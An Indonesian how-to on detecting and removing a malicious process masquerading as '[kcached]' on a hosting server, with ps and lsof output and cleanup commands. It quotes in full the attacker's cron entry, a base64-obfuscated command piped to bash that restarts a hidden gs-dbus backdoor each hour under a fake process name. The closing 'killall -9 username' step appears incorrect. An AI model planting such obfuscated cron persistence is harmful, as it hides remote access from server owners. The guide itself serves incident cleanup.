Jika Anda menemukan sesuatu seperti di bawah ini, kemungkinan server Anda sedang menjalankan proses yang berbahaya. Dari pengalaman pribadi proses tersebut dapat mengakibatkan lonjakan resource dan trafik yang sangat tinggi sehingga akan membuat beberapa service di server tidak dapat diakses.
username 2156078 0.0 0.0 2848 2660 ? Ss Feb09 0:00 [kcached]
username 2156079 0.0 0.0 2852 2660 ? S Feb09 0:01 \_ [kcached]
Anda juga dapat melihat lebih detail proses tersebut menggunakan perintah lsof apakah digunakan untuk tujuan yang sah atau jika Anda tidak yakin
akan hal tersebut lebih baik proses dihilangkan akan dihentikan.
lsof -p 2156078
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
gs-dbus 2156078 username cwd DIR 253,1 4096 125184743 /home/username
gs-dbus 2156078 username rtd DIR 253,1 4096 211550638 /
gs-dbus 2156078 username txt REG 253,1 1118516 125174637 /home/username/.config/dbus/gs-dbus
Selanjutnya untuk menghentikan proses tersebut, Anda bisa menghapus folder .config atau dapat memberikan permission agar tidak adpat diakses oleh siapapun.
chmod 000 /home/username/.config
chattr +i /home/username/.config
Lalu cek crontab username dan hapus cron berikut untuk menghindari proses dapat berjalan lagi.
0 * * * * { echo L3Vzci9iaW4vcGtpbGwgLTAgLVUyNDM4IGdzLWRidXMgMj4vZGV2L251bGwgfHwgU0hFTEw9L3Vzci9sb2NhbC9jcGFuZWwvYmluL25vc2hlbGwgVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPS1rIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzLmRhdCAtbGlxRCAvdXNyL2Jpbi9iYXNoIC1jIGV4ZWMgLWEgW2tjYWNoZWRdIC9ob21lL3VzZXJuYW1lLy5jb25maWcvZGJ1cy9ncy1kYnVzIDI+L2Rldi9udWxsCg==|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng gs-dbus-kernel
Terakhir kill semua proses yang berjalan pada akun username untuk memastikan bersih dari proses kcached.
killall -9 username